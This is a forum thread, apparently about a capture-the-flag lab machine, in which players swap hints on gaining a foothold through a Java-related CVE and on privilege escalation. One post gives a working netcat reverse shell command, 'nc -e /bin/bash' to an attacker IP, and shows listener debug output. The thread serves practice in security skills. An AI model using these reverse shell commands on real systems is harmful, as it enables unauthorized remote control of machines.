alright im stuck, ill try some more tomorrow, good luck to you guys.
1 Like
GG. Hereās to a new season. If anyone needs a hint, hit me up after the 24 hour mark.
1 Like
Did anyone get further with root? I found the stuff discussed here but it doesnāt seem to be it
Any hint 4 d root flag?
some hints? for root
Iām also having difficulties on privesc. So many things feels to be off on this machine.
My guess is that something has to be done with that java environment but I really donāt know where to start from.
To get initial foothold Iāve tried multiple different CVEās -
The java one with the interface will execute a few commands like ls but even something as simple as cd it returns āNot executed for security reasonā.
Of course first I tried a barebones /dev/tcp bash reverse shell, that wouldnāt work.
A netcat reverse shell DID connect, and Iāve tried searching to figure out what the issue is ā the beginning of the connection looks like this but will not take a command:
Summary
Ncat: Version 7.93 ( Ncat - Netcat for the 21st Century )
NCAT DEBUG: Initialized fdlist with 103 maxfds
Ncat: Listening on :::8080
NCAT DEBUG: Added fd 3 to list, nfds 1, maxfd 3
Ncat: Listening on 0.0.0.0:8080
NCAT DEBUG: Added fd 4 to list, nfds 2, maxfd 4
NCAT DEBUG: Added fd 0 to list, nfds 3, maxfd 4
NCAT DEBUG: Initialized fdlist with 100 maxfds
NCAT DEBUG: selecting, fdmax 4
NCAT DEBUG: select returned 1 fds ready
NCAT DEBUG: fd 4 is ready
Ncat: Connection from 10.129.14.105.
NCAT DEBUG: Swapping fd[0] (3) with fd[2] (0)
NCAT DEBUG: Removed fd 3 from list, nfds 2, maxfd 4
NCAT DEBUG: Swapping fd[1] (4) with fd[1] (4)
NCAT DEBUG: Removed fd 4 from list, nfds 1, maxfd 0
Ncat: Connection from 10.129.14.105:58180.
NCAT DEBUG: Added fd 5 to list, nfds 2, maxfd 5
NCAT DEBUG: Added fd 5 to list, nfds 1, maxfd 5
NCAT DEBUG: selecting, fdmax 5
Looks like others have had the netcat issue and said it has something to do with the jdk version but it did the same thing for me with a python scriptā¦?
EDIT #2:
For anyone having similar issues, it was NOT the CVE POC that was at fault for not giving me the shell. So here I learned to use full paths for your shell executeable.
not really a spoiler, but gives the specific reverse shell code that worked for me:
nc 10.10.10.10 9001 -e bash and MANY other reverse shell options wouldnāt work.
nc -e /bin/bash 10.10.10.10 9001 however worked perfectly!
4 Likes
Are you talking of the foothold ? Or the Privesc part ?
Still unable to get shell. PoC not working. Any suggestions?
If your POC doesnāt work well, try to find an other one on Github related to the CVE you identified
1 Like
edited post for clarity. talking about the initial foothold.
Can you please give any hint for privilege escalation?
Anyone any hint for privilege escalation please
Nice One 
Congrats!
1 Like
Do I need to use tools like ysoserial for the foothold? canāt get it to work and donāt want to be wasting time. Thanks!
1 Like
Finally!
3 Likes
502 Bad gateway ā¦ 
The CVEās I found on Github requires a login page but I couldnāt found any on the website?
1 Like
Put it this way you donāt have to find the actual login form or tell it where it is.
There are python and java versions. Iād suggest using one of the python versions and remember to always look at the code youāre running. It knows where the login endpoint is and you can easily find the form from there.
1 Like